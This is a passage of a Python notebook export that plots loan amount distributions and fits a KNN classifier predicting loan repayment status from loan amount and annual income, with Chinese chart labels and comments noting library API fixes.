plt.ylabel('利息收入')
plt.title('贷款金额与利息收入')
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
plt.show()

# In[146]:
# Horizontal box plot of loan amounts; outliers drawn as red squares ('rs').
plt.rc('font', family='STXihei', size=15)
plt.boxplot(loandata['loan_amnt'],1,'rs',vert=False)
plt.xlabel('贷款金额')
plt.title('贷款金额分布')
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
plt.show()

# In[147]:
# Probability-density histogram of loan amounts in 8 bins.
plt.rc('font', family='STXihei', size=15)
# FIX: the normed= keyword was removed from matplotlib (3.1);
# density=True is the replacement.
plt.hist(loandata['loan_amnt'],8,density=True, histtype='stepfilled',facecolor='#99CC01', rwidth=0.9,alpha=0.6,edgecolor='white')
plt.xlabel('贷款金额')
plt.ylabel('概率')
plt.title('贷款金额概率密度')
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='y',alpha=0.4)
plt.show()
# In[148]:
# KNN classification of loan status from loan amount and annual income.
from sklearn.neighbors import KNeighborsClassifier
# FIX: sklearn.cross_validation was removed in scikit-learn 0.20;
# train_test_split now lives in sklearn.model_selection.
from sklearn.model_selection import train_test_split
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt

# In[149]:
# Load the KNN dataset (raw string avoids invalid "\d"-style escapes in the
# Windows path).
knn_data=pd.DataFrame(pd.read_excel(r'D:\data analysis\Data capture\knn_data.xlsx'))

# In[150]:
# First 10 rows.
knn_data.head(10)

# In[151]:
# Split the two features by class for plotting:
# (x1, y1) for Fully Paid, (x2, y2) for Charged Off.
fully_paid_loan=knn_data.loc[(knn_data["loan_status"] == "Fully Paid"),["loan_amnt"]]
fully_paid_annual=knn_data.loc[(knn_data["loan_status"] == "Fully Paid"),["annual_inc"]]
charged_off_loan=knn_data.loc[(knn_data["loan_status"] == "Charged Off"),["loan_amnt"]]
charged_off_annual=knn_data.loc[(knn_data["loan_status"] == "Charged Off"),["annual_inc"]]

# In[152]:
# Chart font: STXihei, size 15.
plt.rc('font', family='STXihei', size=15)
# Scatter: purple triangles for Fully Paid, blue circles for Charged Off.
plt.scatter(fully_paid_loan,fully_paid_annual,color='#9b59b6',marker='^',s=60)
plt.scatter(charged_off_loan,charged_off_annual,color='#3498db',marker='o',s=60)
plt.legend(['Fully Paid', 'Charged Off'], loc='upper right')
plt.xlabel('贷款金额')
plt.ylabel('用户收入')
plt.title('贷款金额与用户收入')
plt.grid( linestyle='--', linewidth=0.2)
plt.show()

# In[153]:
# Independent variables X: loan amount and annual income.
X = np.array(knn_data[['loan_amnt','annual_inc']])
# Dependent variable Y: loan status.
Y = np.array(knn_data['loan_status'])

# In[154]:
# Row counts of X and Y.
X.shape,Y.shape

# In[155]:
# 60/40 train/test split; random_state pins the split for reproducibility.
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.4, random_state=0)

# In[156]:
# Training-set row counts.
X_train.shape,y_train.shape

# In[157]:
# Fit a 3-nearest-neighbours classifier on the training set.
clf = KNeighborsClassifier(n_neighbors=3)
clf.fit(X_train,y_train)

# In[158]:
# Accuracy on the held-out test set.
clf.score(X_test, y_test)

# In[159]:
# New observation: loan amount 5000, annual income 40000.
new_data = np.array([[5000,40000]])

# In[160]:
# Predicted class for the new observation.
clf.predict(new_data)

# In[161]:
# Class labels and per-class membership probabilities.
# FIX: removed dataset-dump junk ("| 0.343232 | 0.766862 |") that was fused
# onto this line and made it a syntax error.
clf.classes_,clf.predict_proba(new_data)